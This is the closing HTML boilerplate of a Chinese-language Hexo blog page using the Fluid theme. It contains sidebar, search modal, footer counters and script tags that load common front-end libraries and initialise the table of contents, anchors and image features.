    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/scrollAnimation.js"></script>
<script src="/js/codeType.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
